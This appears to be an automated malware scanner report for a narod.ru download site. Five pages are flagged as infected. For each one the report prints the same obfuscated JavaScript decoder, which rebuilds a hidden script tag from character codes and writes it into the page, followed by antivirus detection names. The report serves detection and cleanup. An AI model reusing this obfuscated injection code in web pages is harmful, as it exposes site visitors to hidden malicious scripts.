Malware Scanner report for rolling7fnv.narod.ru

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://rolling7fnv.narod.ru/	200 OK Content-Length: 9678 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.269498142481176	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/abnl/?adsdata=RpZCMuMV6VMaBiz4ixhCCq6a5^eLmKCP4;tEgL!;kQ1l9RKWFenv2jke1dZLgfMGjWCFR3iVeQL0PdBfvS!P^XX^v2ghTIe02ke^liM01pW7JXeaeU4zue75kpJliAY^42EXCsxGEf9hrbcY2C6eRO1uakyj0H4f9tQ8wjbNG2;apqFbfuhGMgsme1VF5RTa	200 OK Content-Length: 2521 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/skachat-rusifikator-dlya-fallout-tactics.html	200 OK Content-Length: 10530 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.203860848502714	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/abnl/?adsdata=VKdSCEPjRWXgXvhv50yjwt0M20BRruM6;itvw!q8TQkO5eMIljimaDUqgrJnMxQ6cEEY9pi2kBA9pdDm9yAG!Z9vGS!PcjOnLgfMX29sY4LUA65PuQp6VFiy20W0q6WVUkCZEkvXfvqgE4znAlbVtmyhklXiNn40WxrA9zc94O9fOA7Zhcc0MfPl9FTi5RTr	200 OK Content-Length: 2537 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/rusifikator-dlya-tuneup-utilities-2009-80300020.html	200 OK Content-Length: 10705 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.875158403970829	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/abnl/?adsdata=Z6ysmvcSE0WThdKE8mg9Wr3r6gRFpKCqh0A6tynKfrhehMuUtqekxWpfvL7Z7nsa4q;zxOS2cKgphzWFRsP1VfrCXDEDq1LHGtaMOtqdIqXxcCRVDAyY!qjkwOeD!J4KhdlMKfGAx6ZAkaTLjhuZLKenugwBeBWIIyhVVZVqKxpanPdP5gaT!T4B;JvQc95y5fMo	200 OK Content-Length: 2537 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/rusifikator-dlya-winstep-xtreme.html	200 OK Content-Length: 9801 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.690402070046602	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/abnl/?adsdata=rGz^ODJ3v;RD8dw9O4DUXv3RydMSGOWHATOQ6rMYF36Ce2563m3znYCgKdBNuG60!HSk8WLGO;mI^8azG7;tfs15ie9xYVAbzpqjq3niAbWjfpfgr8RiJ!RankWIi!!V1yIMxKjXa060rs4RW1!;e;RN6G3wh27ZHf5SgDdcsRnzggO;LLOeA5UdgiC4r^P7MVHBqgoo	200 OK Content-Length: 2505 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/skachat-pixelan-spicemaster-25-pro-rusifikator.html	200 OK Content-Length: 10205 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.8444679817012	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://rolling7fnv.narod.ru/abnl/?adsdata=yD3ifALLQSN!7bNsOt5cISLcRHVNiPimCD;hG8QZI1vPYgiAN6LaAn592XptSqLDMIWux1HDuxcPe37IxkmcbOpeCM^KnABzYsIHeI6SI8X1J0es;zNl183Yi7eJw5bZLA6mdNIfyWSCrRw3U3ibiFlfWUTCaYG3VNJHEyWbthDtx2wMv5JsL76;aIUby4TKEUoo	200 OK Content-Length: 2509 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rolling7fnv.narod.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 03:41:49 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8

Second query (visit from search engine):
GET / HTTP/1.1
Host: rolling7fnv.narod.ru
Referer: http://www.google.com/search?q=rolling7fnv.narod.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rolling7fnv.narod.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://rolling7fnv.narod.ru/

Result: rolling7fnv.narod.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for rolling7fnv.narod.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools